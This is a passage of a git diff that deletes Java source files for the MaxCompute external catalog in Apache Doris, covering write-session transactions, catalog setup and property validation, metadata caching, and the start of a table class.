follow table's partition column order - staticPartitionSpecStr = table.getPartitionColumns().stream() - .map(col -> col.getName()) - .filter(staticSpec::containsKey) - .map(name -> name + "=" + staticSpec.get(name)) - .collect(Collectors.joining(",")); - } - isOverwrite = mcCtx.isOverwrite(); - } - - TableWriteSessionBuilder builder = new TableWriteSessionBuilder() - .identifier(tableId) - .withSettings(catalog.getSettings()) - .withMaxFieldSize(catalog.getMaxFieldSize()) - .withArrowOptions(ArrowOptions.newBuilder() - .withDatetimeUnit(TimestampUnit.MILLI) - .withTimestampUnit(TimestampUnit.MILLI) - .build()); - - if (isStaticPartition) { - builder.partition(new PartitionSpec(staticPartitionSpecStr)); - } else if (isDynamicPartition) { - builder.withDynamicPartitionOptions(DynamicPartitionOptions.createDefault()); - } - - if (isOverwrite) { - builder.overwrite(true); - } - - TableBatchWriteSession writeSession = builder.buildBatchWriteSession(); - writeSessionId = writeSession.getId(); - nextBlockId.set(0); - - LOG.info("Created MC Storage API write session: {} for table {}.{}", - writeSessionId, catalog.getDefaultProject(), table.getName()); - } catch (Exception e) { - throw new UserException("Failed to begin insert for MaxCompute table " - + dorisTable.getName() + ": " + e.getMessage(), e); - } - } - - public String getWriteSessionId() { - return writeSessionId; - } - - public long allocateBlockIdRange(String requestWriteSessionId, long length) throws UserException { - if (length <= 0) { - throw new UserException("MaxCompute block_id allocation length must be positive: " + length); - } - if (writeSessionId == null || writeSessionId.isEmpty()) { - throw new UserException("MaxCompute write session has not been initialized"); - } - if (!writeSessionId.equals(requestWriteSessionId)) { - throw new UserException("MaxCompute write session mismatch, expected=" + writeSessionId - + ", actual=" + requestWriteSessionId); - } - - long start; - long endExclusive; - do { - start = nextBlockId.get(); - endExclusive = start + length; - if (endExclusive > Config.max_compute_write_max_block_count) { - throw new UserException("MaxCompute block_id exceeds limit, start=" - + start + ", length=" + length + ", maxBlockCount=" - + Config.max_compute_write_max_block_count); - } - } while (!nextBlockId.compareAndSet(start, endExclusive)); - - LOG.info("Allocated MaxCompute block_id range: sessionId={}, start={}, length={}", - writeSessionId, start, length); - return start; - } - - private void appendCommitMessages(List allMessages, String encodedCommitMessage) - throws Exception { - byte[] bytes = Base64.getDecoder().decode(encodedCommitMessage); - ByteArrayInputStream bais = new ByteArrayInputStream(bytes); - ObjectInputStream ois = new ObjectInputStream(bais); - Object payload = ois.readObject(); - ois.close(); - - if (payload instanceof WriterCommitMessage) { - allMessages.add((WriterCommitMessage) payload); - return; - } - if (payload instanceof List) { - for (Object item : (List) payload) { - if (!(item instanceof WriterCommitMessage)) { - throw new UserException("Unexpected MaxCompute commit payload item type: " - + (item == null ? "null" : item.getClass().getName())); - } - allMessages.add((WriterCommitMessage) item); - } - return; - } - throw new UserException("Unexpected MaxCompute commit payload type: " - + (payload == null ? "null" : payload.getClass().getName())); - } - - public void finishInsert() throws UserException { - try { - long t0 = System.currentTimeMillis(); - // Collect all WriterCommitMessages from BEs - List allMessages = new ArrayList<>(); - synchronized (this) { - for (TMCCommitData data : commitDataList) { - if (data.isSetCommitMessage() && !data.getCommitMessage().isEmpty()) { - appendCommitMessages(allMessages, data.getCommitMessage()); - } - } - } - long t1 = System.currentTimeMillis(); - - // Restore session and commit all messages - TableIdentifier tableId = catalog.getOdpsTableIdentifier(table.getDbName(), table.getName()); - TableBatchWriteSession commitSession = new TableWriteSessionBuilder() - .identifier(tableId) - .withSessionId(writeSessionId) - .withSettings(catalog.getSettings()) - .buildBatchWriteSession(); - long t2 = System.currentTimeMillis(); - - commitSession.commit(allMessages.toArray(new WriterCommitMessage[0])); - long t3 = System.currentTimeMillis(); - LOG.info("Committed MC write session {} with {} messages for table {}.{}" - + " Breakdown: deserialize={}ms, restoreSession={}ms, commit={}ms, total={}ms", - writeSessionId, allMessages.size(), catalog.getDefaultProject(), table.getName(), - t1 - t0, t2 - t1, t3 - t2, t3 - t0); - } catch (Exception e) { - throw new UserException("Failed to commit MaxCompute write session: " + e.getMessage(), e); - } - } - - @Override - public void commit() throws UserException { - // commit is handled in finishInsert() - } - - @Override - public void rollback() { - // MC sessions auto-expire if not committed; no explicit rollback needed - LOG.info("MCTransaction rollback called; uncommitted sessions will auto-expire."); - } - - public long getUpdateCnt() { - return commitDataList.stream().mapToLong(TMCCommitData::getRowCount).sum(); - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalCatalog.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalCatalog.java deleted file mode 100644 index 75a6190d6960c5..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalCatalog.java +++ /dev/null @@ -1,524 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.maxcompute; - - -import org.apache.doris.common.DdlException; -import org.apache.doris.common.maxcompute.MCProperties; -import org.apache.doris.common.maxcompute.MCUtils; -import org.apache.doris.datasource.CatalogProperty; -import org.apache.doris.datasource.ExternalCatalog; -import org.apache.doris.datasource.InitCatalogLog; -import org.apache.doris.datasource.SessionContext; -import org.apache.doris.transaction.TransactionManagerFactory; - -import com.aliyun.odps.Odps; -import com.aliyun.odps.OdpsException; -import com.aliyun.odps.Partition; -import com.aliyun.odps.account.AccountFormat; -import com.aliyun.odps.table.TableIdentifier; -import com.aliyun.odps.table.configuration.RestOptions; -import com.aliyun.odps.table.configuration.SplitOptions; -import com.aliyun.odps.table.enviroment.Credentials; -import com.aliyun.odps.table.enviroment.EnvironmentSettings; -import com.google.common.collect.ImmutableList; -import org.apache.log4j.Logger; - -import java.time.ZoneId; -import java.util.ArrayList; -import java.util.Collections; -import java.util.HashMap; -import java.util.Iterator; -import java.util.List; -import java.util.Map; -import java.util.stream.Collectors; - -public class MaxComputeExternalCatalog extends ExternalCatalog { - private static final Logger LOG = Logger.getLogger(MaxComputeExternalCatalog.class); - - // you can ref : https://help.aliyun.com/zh/maxcompute/user-guide/endpoints - private static final String endpointTemplate = "http://service.{}.maxcompute.aliyun-inc.com/api"; - private Map props; - private Odps odps; - private String endpoint; - private String defaultProject; - private String quota; - private EnvironmentSettings settings; - - private String splitStrategy; - private SplitOptions splitOptions; - private long splitRowCount; - private long splitByteSize; - - private int connectTimeout; - private int readTimeout; - private int retryTimes; - private long maxFieldSize; - - public boolean dateTimePredicatePushDown; - - AccountFormat accountFormat = AccountFormat.DISPLAYNAME; - - private McStructureHelper mcStructureHelper = null; - - private static final Map REGION_ZONE_MAP; - private static final List REQUIRED_PROPERTIES = ImmutableList.of( - MCProperties.PROJECT, - MCProperties.ENDPOINT - ); - - static { - Map map = new HashMap<>(); - - map.put("cn-hangzhou", ZoneId.of("Asia/Shanghai")); - map.put("cn-shanghai", ZoneId.of("Asia/Shanghai")); - map.put("cn-shanghai-finance-1", ZoneId.of("Asia/Shanghai")); - map.put("cn-beijing", ZoneId.of("Asia/Shanghai")); - map.put("cn-north-2-gov-1", ZoneId.of("Asia/Shanghai")); - map.put("cn-zhangjiakou", ZoneId.of("Asia/Shanghai")); - map.put("cn-wulanchabu", ZoneId.of("Asia/Shanghai")); - map.put("cn-shenzhen", ZoneId.of("Asia/Shanghai")); - map.put("cn-shenzhen-finance-1", ZoneId.of("Asia/Shanghai")); - map.put("cn-chengdu", ZoneId.of("Asia/Shanghai")); - map.put("cn-hongkong", ZoneId.of("Asia/Shanghai")); - map.put("ap-southeast-1", ZoneId.of("Asia/Singapore")); - map.put("ap-southeast-2", ZoneId.of("Australia/Sydney")); - map.put("ap-southeast-3", ZoneId.of("Asia/Kuala_Lumpur")); - map.put("ap-southeast-5", ZoneId.of("Asia/Jakarta")); - map.put("ap-northeast-1", ZoneId.of("Asia/Tokyo")); - map.put("eu-central-1", ZoneId.of("Europe/Berlin")); - map.put("eu-west-1", ZoneId.of("Europe/London")); - map.put("us-west-1", ZoneId.of("America/Los_Angeles")); - map.put("us-east-1", ZoneId.of("America/New_York")); - map.put("me-east-1", ZoneId.of("Asia/Dubai")); - - REGION_ZONE_MAP = Collections.unmodifiableMap(map); - } - - - public MaxComputeExternalCatalog(long catalogId, String name, String resource, Map props, - String comment) { - super(catalogId, name, InitCatalogLog.Type.MAX_COMPUTE, comment); - catalogProperty = new CatalogProperty(resource, props); - } - - //Compatible with existing catalogs in previous versions. - protected void generatorEndpoint() { - Map props = catalogProperty.getProperties(); - - if (props.containsKey(MCProperties.ENDPOINT)) { - // This is a new version of the property, so no parsing conversion is required. - endpoint = props.get(MCProperties.ENDPOINT); - } else if (props.containsKey(MCProperties.TUNNEL_SDK_ENDPOINT)) { - // If customized `mc.tunnel_endpoint` before, - // need to convert the value of this property because used the `tunnel API` before. - String tunnelEndpoint = props.get(MCProperties.TUNNEL_SDK_ENDPOINT); - endpoint = tunnelEndpoint.replace("//dt", "//service") + "/api"; - } else if (props.containsKey(MCProperties.ODPS_ENDPOINT)) { - // If you customized `mc.odps_endpoint` before, - // this value is equivalent to the new version of `mc.endpoint`, so you can use it directly - endpoint = props.get(MCProperties.ODPS_ENDPOINT); - } else if (props.containsKey(MCProperties.REGION)) { - //Copied from original logic. - String region = props.get(MCProperties.REGION); - if (region.startsWith("oss-")) { - // may use oss-cn-beijing, ensure compatible - region = region.replace("oss-", ""); - } - boolean enablePublicAccess = Boolean.parseBoolean(props.getOrDefault(MCProperties.PUBLIC_ACCESS, - MCProperties.DEFAULT_PUBLIC_ACCESS)); - endpoint = endpointTemplate.replace("{}", region); - if (enablePublicAccess) { - endpoint = endpoint.replace("-inc", ""); - } - } - /* - Since MCProperties.REGION is a REQUIRED_PROPERTIES in previous versions - and MCProperties.ENDPOINT is a REQUIRED_PROPERTIES in current versions, - `else {}` is not needed here. - */ - } - - - @Override - protected void initLocalObjectsImpl() { - props = catalogProperty.getProperties(); - - generatorEndpoint(); - - defaultProject = props.get(MCProperties.PROJECT); - quota = props.getOrDefault(MCProperties.QUOTA, MCProperties.DEFAULT_QUOTA); - - boolean splitCrossPartition = - Boolean.parseBoolean(props.getOrDefault(MCProperties.SPLIT_CROSS_PARTITION, - MCProperties.DEFAULT_SPLIT_CROSS_PARTITION)); - - splitStrategy = props.getOrDefault(MCProperties.SPLIT_STRATEGY, MCProperties.DEFAULT_SPLIT_STRATEGY); - if (splitStrategy.equals(MCProperties.SPLIT_BY_BYTE_SIZE_STRATEGY)) { - splitByteSize = Long.parseLong(props.getOrDefault(MCProperties.SPLIT_BYTE_SIZE, - MCProperties.DEFAULT_SPLIT_BYTE_SIZE)); - splitOptions = SplitOptions.newBuilder() - .SplitByByteSize(splitByteSize) - .withCrossPartition(splitCrossPartition) - .build(); - } else { - splitRowCount = Long.parseLong(props.getOrDefault(MCProperties.SPLIT_ROW_COUNT, - MCProperties.DEFAULT_SPLIT_ROW_COUNT)); - splitOptions = SplitOptions.newBuilder() - .SplitByRowOffset() - .withCrossPartition(splitCrossPartition) - .build(); - } - - connectTimeout = Integer.parseInt( - props.getOrDefault(MCProperties.CONNECT_TIMEOUT, MCProperties.DEFAULT_CONNECT_TIMEOUT)); - readTimeout = Integer.parseInt( - props.getOrDefault(MCProperties.READ_TIMEOUT, MCProperties.DEFAULT_READ_TIMEOUT)); - retryTimes = Integer.parseInt( - props.getOrDefault(MCProperties.RETRY_COUNT, MCProperties.DEFAULT_RETRY_COUNT)); - maxFieldSize = Long.parseLong( - props.getOrDefault(MCProperties.MAX_FIELD_SIZE, MCProperties.DEFAULT_MAX_FIELD_SIZE)); - - RestOptions restOptions = RestOptions.newBuilder() - .withConnectTimeout(connectTimeout) - .withReadTimeout(readTimeout) - .withRetryTimes(retryTimes).build(); - - dateTimePredicatePushDown = Boolean.parseBoolean( - props.getOrDefault(MCProperties.DATETIME_PREDICATE_PUSH_DOWN, - MCProperties.DEFAULT_DATETIME_PREDICATE_PUSH_DOWN)); - - odps = MCUtils.createMcClient(props); - odps.setDefaultProject(defaultProject); - odps.setEndpoint(endpoint); - odps.getRestClient().setConnectTimeout(connectTimeout); - odps.getRestClient().setReadTimeout(readTimeout); - odps.getRestClient().setRetryTimes(retryTimes); - - String accountFormatProp = props.getOrDefault(MCProperties.ACCOUNT_FORMAT, MCProperties.DEFAULT_ACCOUNT_FORMAT); - if (accountFormatProp.equals(MCProperties.ACCOUNT_FORMAT_NAME)) { - accountFormat = AccountFormat.DISPLAYNAME; - } else if (accountFormatProp.equals(MCProperties.ACCOUNT_FORMAT_ID)) { - accountFormat = AccountFormat.ID; - } - odps.setAccountFormat(accountFormat); - Credentials credentials = Credentials.newBuilder().withAccount(odps.getAccount()) - .withAppAccount(odps.getAppAccount()).build(); - - settings = EnvironmentSettings.newBuilder() - .withCredentials(credentials) - .withServiceEndpoint(odps.getEndpoint()) - .withQuotaName(quota) - .withRestOptions(restOptions) - .build(); - - boolean enableNamespaceSchema = Boolean.parseBoolean( - props.getOrDefault(MCProperties.ENABLE_NAMESPACE_SCHEMA, MCProperties.DEFAULT_ENABLE_NAMESPACE_SCHEMA)); - mcStructureHelper = McStructureHelper.getHelper(enableNamespaceSchema, defaultProject); - - initPreExecutionAuthenticator(); - metadataOps = new MaxComputeMetadataOps(this, odps); - transactionManager = TransactionManagerFactory.createMCTransactionManager(this); - } - - @Override - public void checkWhenCreating() throws DdlException { - boolean testConnection = Boolean.parseBoolean(catalogProperty.getOrDefault(TEST_CONNECTION, - String.valueOf(DEFAULT_TEST_CONNECTION))); - if (!testConnection) { - return; - } - // MaxCompute has no MetastoreProperties-backed connectivity tester yet, - // so run its catalog-specific test directly under the common test_connection switch. - boolean enableNamespaceSchema = Boolean.parseBoolean( - catalogProperty.getOrDefault(MCProperties.ENABLE_NAMESPACE_SCHEMA, - MCProperties.DEFAULT_ENABLE_NAMESPACE_SCHEMA)); - try { - initLocalObjects(); - validateMaxComputeConnection(enableNamespaceSchema); - } catch (Exception e) { - throw new DdlException(e.getMessage(), e); - } - } - - protected void validateMaxComputeConnection(boolean enableNamespaceSchema) { - if (enableNamespaceSchema) { - validateMaxComputeProjectAndNamespaceSchema(); - } else { - validateMaxComputeProject(); - } - } - - private void validateMaxComputeProject() { - boolean projectExists; - try { - projectExists = maxComputeProjectExists(defaultProject); - } catch (Exception e) { - throw new RuntimeException("Failed to validate MaxCompute project '" + defaultProject - + "'. Check " + MCProperties.PROJECT + ", " + MCProperties.ENDPOINT - + " and credentials. Cause: " + e.getMessage(), e); - } - if (!projectExists) { - throw new RuntimeException("Failed to validate MaxCompute project '" + defaultProject - + "'. Check " + MCProperties.PROJECT + ", " + MCProperties.ENDPOINT - + " and credentials. Cause: project does not exist or is not accessible"); - } - } - - private void validateMaxComputeProjectAndNamespaceSchema() { - try { - validateMaxComputeNamespaceSchemaAccess(defaultProject); - } catch (Exception e) { - throw new RuntimeException("Failed to validate MaxCompute project '" + defaultProject - + "' with namespace schema. Check " + MCProperties.PROJECT + ", " + MCProperties.ENDPOINT - + ", credentials, and whether the schema list is accessible for the namespace schema " - + "configuration. Cause: " + e.getMessage(), e); - } - } - - protected boolean maxComputeProjectExists(String projectName) throws OdpsException { - return odps.projects().exists(projectName); - } - - protected void validateMaxComputeNamespaceSchemaAccess(String projectName) throws OdpsException { - odps.schemas().iterator(projectName).hasNext(); - } - - public Odps getClient() { - makeSureInitialized(); - return odps; - } - - public McStructureHelper getMcStructureHelper() { - makeSureInitialized(); - return mcStructureHelper; - } - - protected List listDatabaseNames() { - makeSureInitialized(); - return mcStructureHelper.listDatabaseNames(getClient(), getDefaultProject()); - } - - @Override - public boolean tableExist(SessionContext ctx, String dbName, String tblName) { - makeSureInitialized(); - return mcStructureHelper.tableExist(getClient(), dbName, tblName); - - } - - public List listPartitionNames(String dbName, String tbl) { - return listPartitionNames(dbName, tbl, 0, -1); - } - - public List listPartitionNames(String dbName, String tbl, long skip, long limit) { - if (mcStructureHelper.databaseExist(getClient(), dbName)) { - List parts; - if (limit < 0) { - parts = mcStructureHelper.getPartitions(getClient(), dbName, tbl); - } else { - skip = skip < 0 ? 0 : skip; - parts = new ArrayList<>(); - Iterator it = mcStructureHelper.getPartitionIterator(getClient(), dbName, tbl); - int count = 0; - while (it.hasNext()) { - if (count < skip) { - count++; - it.next(); - } else if (parts.size() >= limit) { - break; - } else { - parts.add(it.next()); - } - } - } - return parts.stream().map(p -> p.getPartitionSpec().toString(false, true)) - .collect(Collectors.toList()); - } else { - throw new RuntimeException("MaxCompute schema/project: " + dbName + " not exists."); - } - } - - @Override - protected List listTableNamesFromRemote(SessionContext ctx, String dbName) { - return mcStructureHelper.listTableNames(getClient(), dbName); - } - - public Map getProperties() { - makeSureInitialized(); - return props; - } - - public String getEndpoint() { - makeSureInitialized(); - return endpoint; - } - - public String getDefaultProject() { - makeSureInitialized(); - return defaultProject; - } - - public int getRetryTimes() { - makeSureInitialized(); - return retryTimes; - } - - public int getConnectTimeout() { - makeSureInitialized(); - return connectTimeout; - } - - public int getReadTimeout() { - makeSureInitialized(); - return readTimeout; - } - - public long getMaxFieldSize() { - makeSureInitialized(); - return maxFieldSize; - } - - public boolean getDateTimePredicatePushDown() { - return dateTimePredicatePushDown; - } - - public ZoneId getProjectDateTimeZone() { - makeSureInitialized(); - - String[] endpointSplit = endpoint.split("\\."); - if (endpointSplit.length >= 2) { - // http://service.cn-hangzhou-vpc.maxcompute.aliyun-inc.com/api => cn-hangzhou-vpc - String regionAndSuffix = endpointSplit[1]; - - //remove `-vpc` and `-intranet` suffix. - String region = regionAndSuffix.replace("-vpc", "").replace("-intranet", ""); - if (REGION_ZONE_MAP.containsKey(region)) { - return REGION_ZONE_MAP.get(region); - } - LOG.warn("Not exist region. region = " + region + ". endpoint = " + endpoint + ". use systemDefault."); - return ZoneId.systemDefault(); - } - LOG.warn("Split EndPoint " + endpoint + "fill. use systemDefault."); - return ZoneId.systemDefault(); - } - - public String getQuota() { - return quota; - } - - public SplitOptions getSplitOption() { - return splitOptions; - } - - public EnvironmentSettings getSettings() { - return settings; - } - - public String getSplitStrategy() { - return splitStrategy; - } - - public long getSplitRowCount() { - return splitRowCount; - } - - - public long getSplitByteSize() { - return splitByteSize; - } - - public com.aliyun.odps.Table getOdpsTable(String dbName, String tableName) { - return mcStructureHelper.getOdpsTable(getClient(), dbName, tableName); - } - - public TableIdentifier getOdpsTableIdentifier(String dbName, String tableName) { - return mcStructureHelper.getTableIdentifier(dbName, tableName); - } - - @Override - public void checkProperties() throws DdlException { - super.checkProperties(); - Map props = catalogProperty.getProperties(); - for (String requiredProperty : REQUIRED_PROPERTIES) { - if (!props.containsKey(requiredProperty)) { - throw new DdlException("Required property '" + requiredProperty + "' is missing"); - } - } - - try { - splitStrategy = props.getOrDefault(MCProperties.SPLIT_STRATEGY, MCProperties.DEFAULT_SPLIT_STRATEGY); - if (splitStrategy.equals(MCProperties.SPLIT_BY_BYTE_SIZE_STRATEGY)) { - splitByteSize = Long.parseLong(props.getOrDefault(MCProperties.SPLIT_BYTE_SIZE, - MCProperties.DEFAULT_SPLIT_BYTE_SIZE)); - - if (splitByteSize < 10485760L) { - throw new DdlException(MCProperties.SPLIT_BYTE_SIZE + " must be greater than or equal to 10485760"); - } - - } else if (splitStrategy.equals(MCProperties.SPLIT_BY_ROW_COUNT_STRATEGY)) { - splitRowCount = Long.parseLong(props.getOrDefault(MCProperties.SPLIT_ROW_COUNT, - MCProperties.DEFAULT_SPLIT_ROW_COUNT)); - if (splitRowCount <= 0) { - throw new DdlException(MCProperties.SPLIT_ROW_COUNT + " must be greater than 0"); - } - - } else { - throw new DdlException("property " + MCProperties.SPLIT_STRATEGY + "must is " - + MCProperties.SPLIT_BY_BYTE_SIZE_STRATEGY + " or " + MCProperties.SPLIT_BY_ROW_COUNT_STRATEGY); - } - } catch (NumberFormatException e) { - throw new DdlException("property " + MCProperties.SPLIT_BYTE_SIZE + "/" - + MCProperties.SPLIT_ROW_COUNT + "must be an integer"); - } - - String accountFormatProp = props.getOrDefault(MCProperties.ACCOUNT_FORMAT, MCProperties.DEFAULT_ACCOUNT_FORMAT); - if (accountFormatProp.equals(MCProperties.ACCOUNT_FORMAT_NAME)) { - accountFormat = AccountFormat.DISPLAYNAME; - } else if (accountFormatProp.equals(MCProperties.ACCOUNT_FORMAT_ID)) { - accountFormat = AccountFormat.ID; - } else { - throw new DdlException("property " + MCProperties.ACCOUNT_FORMAT + "only support name and id"); - } - - try { - connectTimeout = Integer.parseInt( - props.getOrDefault(MCProperties.CONNECT_TIMEOUT, MCProperties.DEFAULT_CONNECT_TIMEOUT)); - readTimeout = Integer.parseInt( - props.getOrDefault(MCProperties.READ_TIMEOUT, MCProperties.DEFAULT_READ_TIMEOUT)); - retryTimes = Integer.parseInt( - props.getOrDefault(MCProperties.RETRY_COUNT, MCProperties.DEFAULT_RETRY_COUNT)); - if (connectTimeout <= 0) { - throw new DdlException(MCProperties.CONNECT_TIMEOUT + " must be greater than 0"); - } - - if (readTimeout <= 0) { - throw new DdlException(MCProperties.READ_TIMEOUT + " must be greater than 0"); - } - - if (retryTimes <= 0) { - throw new DdlException(MCProperties.RETRY_COUNT + " must be greater than 0"); - } - - } catch (NumberFormatException e) { - throw new DdlException("property " + MCProperties.CONNECT_TIMEOUT + "/" - + MCProperties.READ_TIMEOUT + "/" + MCProperties.RETRY_COUNT + "must be an integer"); - } - - MCUtils.checkAuthProperties(props); - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalDatabase.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalDatabase.java deleted file mode 100644 index 7cd38b9d13a007..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalDatabase.java +++ /dev/null @@ -1,47 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.maxcompute; - -import org.apache.doris.datasource.ExternalCatalog; -import org.apache.doris.datasource.ExternalDatabase; -import org.apache.doris.datasource.InitDatabaseLog; - -/** - * MaxCompute external database. - */ -public class MaxComputeExternalDatabase extends ExternalDatabase { - /** - * Create MaxCompute external database. - * - * @param extCatalog External catalog this database belongs to. - * @param id database id. - * @param name database name. - */ - public MaxComputeExternalDatabase(ExternalCatalog extCatalog, long id, String name, String remoteName) { - super(extCatalog, id, name, remoteName, InitDatabaseLog.Type.MAX_COMPUTE); - } - - @Override - public MaxComputeExternalTable buildTableInternal(String remoteTableName, String localTableName, long tblId, - ExternalCatalog catalog, - ExternalDatabase db) { - return new MaxComputeExternalTable(tblId, localTableName, remoteTableName, - (MaxComputeExternalCatalog) extCatalog, - (MaxComputeExternalDatabase) db); - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalMetaCache.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalMetaCache.java deleted file mode 100644 index 05bf7e51e300d2..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalMetaCache.java +++ /dev/null @@ -1,115 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.maxcompute; - -import org.apache.doris.common.Config; -import org.apache.doris.datasource.CacheException; -import org.apache.doris.datasource.ExternalCatalog; -import org.apache.doris.datasource.ExternalTable; -import org.apache.doris.datasource.NameMapping; -import org.apache.doris.datasource.SchemaCacheKey; -import org.apache.doris.datasource.SchemaCacheValue; -import org.apache.doris.datasource.TablePartitionValues; -import org.apache.doris.datasource.metacache.AbstractExternalMetaCache; -import org.apache.doris.datasource.metacache.CacheSpec; -import org.apache.doris.datasource.metacache.MetaCacheEntryDef; -import org.apache.doris.datasource.metacache.MetaCacheEntryInvalidation; - -import java.util.Collection; -import java.util.Collections; -import java.util.Map; -import java.util.concurrent.ExecutorService; - -/** - * MaxCompute engine implementation of {@link AbstractExternalMetaCache}. - * - *

Registered entries: - *

    - *
  • {@code partition_values}: partition value/index structures per table
  • - *
  • {@code schema}: schema cache keyed by {@link SchemaCacheKey}
  • - *
- */ -public class MaxComputeExternalMetaCache extends AbstractExternalMetaCache { - public static final String ENGINE = "maxcompute"; - public static final String ENTRY_PARTITION_VALUES = "partition_values"; - public static final String ENTRY_SCHEMA = "schema"; - private final EntryHandle partitionValuesEntry; - private final EntryHandle schemaEntry; - - public MaxComputeExternalMetaCache(ExecutorService refreshExecutor) { - super(ENGINE, refreshExecutor); - partitionValuesEntry = registerEntry(MetaCacheEntryDef.contextualOnly( - ENTRY_PARTITION_VALUES, - NameMapping.class, - TablePartitionValues.class, - CacheSpec.of( - true, - Config.external_cache_refresh_time_minutes * 60L, - Config.max_hive_partition_table_cache_num), - MetaCacheEntryInvalidation.forNameMapping(nameMapping -> nameMapping))); - schemaEntry = registerEntry(MetaCacheEntryDef.of( - ENTRY_SCHEMA, - SchemaCacheKey.class, - SchemaCacheValue.class, - this::loadSchemaCacheValue, - defaultSchemaCacheSpec(), - MetaCacheEntryInvalidation.forNameMapping(SchemaCacheKey::getNameMapping))); - } - - @Override - public Collection aliases() { - return Collections.singleton("max_compute"); - } - - public TablePartitionValues getPartitionValues(NameMapping nameMapping) { - return partitionValuesEntry.get(nameMapping.getCtlId()).get(nameMapping, this::loadPartitionValues); - } - - public MaxComputeSchemaCacheValue getMaxComputeSchemaCacheValue(long catalogId, SchemaCacheKey key) { - SchemaCacheValue schemaCacheValue = schemaEntry.get(catalogId).get(key); - return (MaxComputeSchemaCacheValue) schemaCacheValue; - } - - private SchemaCacheValue loadSchemaCacheValue(SchemaCacheKey key) { - ExternalTable dorisTable = findExternalTable(key.getNameMapping(), ENGINE); - return dorisTable.initSchemaAndUpdateTime(key).orElseThrow(() -> - new CacheException("failed to load maxcompute schema cache value for: %s.%s.%s", - null, key.getNameMapping().getCtlId(), key.getNameMapping().getLocalDbName(), - key.getNameMapping().getLocalTblName())); - } - - private TablePartitionValues loadPartitionValues(NameMapping nameMapping) { - MaxComputeSchemaCacheValue schemaCacheValue = - getMaxComputeSchemaCacheValue(nameMapping.getCtlId(), new SchemaCacheKey(nameMapping)); - TablePartitionValues partitionValues = new TablePartitionValues(); - partitionValues.addPartitions( - schemaCacheValue.getPartitionSpecs(), - schemaCacheValue.getPartitionSpecs().stream() - .map(spec -> MaxComputeExternalTable.parsePartitionValues( - schemaCacheValue.getPartitionColumnNames(), spec)) - .collect(java.util.stream.Collectors.toList()), - schemaCacheValue.getPartitionTypes(), - Collections.nCopies(schemaCacheValue.getPartitionSpecs().size(), 0L)); - return partitionValues; - } - - @Override - protected Map catalogPropertyCompatibilityMap() { - return singleCompatibilityMap(ExternalCatalog.SCHEMA_CACHE_TTL_SECOND, ENTRY_SCHEMA); - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalTable.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalTable.java deleted file mode 100644 index ec6e7f79d6df83..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalTable.java +++ /dev/null @@ -1,347 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.maxcompute; - -import org.apache.doris.catalog.ArrayType; -import org.apache.doris.catalog.Column; -import org.apache.doris.catalog.Env; -import org.apache.doris.catalog.MapType; -import org.apache.doris.catalog.PartitionItem; -import org.apache.doris.catalog.ScalarType; -import org.apache.doris.catalog.StructField; -import org.apache.doris.catalog.StructType; -import org.apache.doris.catalog.Type; -import org.apache.doris.datasource.ExternalTable; -import org.apache.doris.datasource.SchemaCacheValue; -import org.apache.doris.datasource.TablePartitionValues; -import org.apache.doris.datasource.mvcc.MvccSnapshot; -import org.apache.doris.thrift.TMCTable; -import 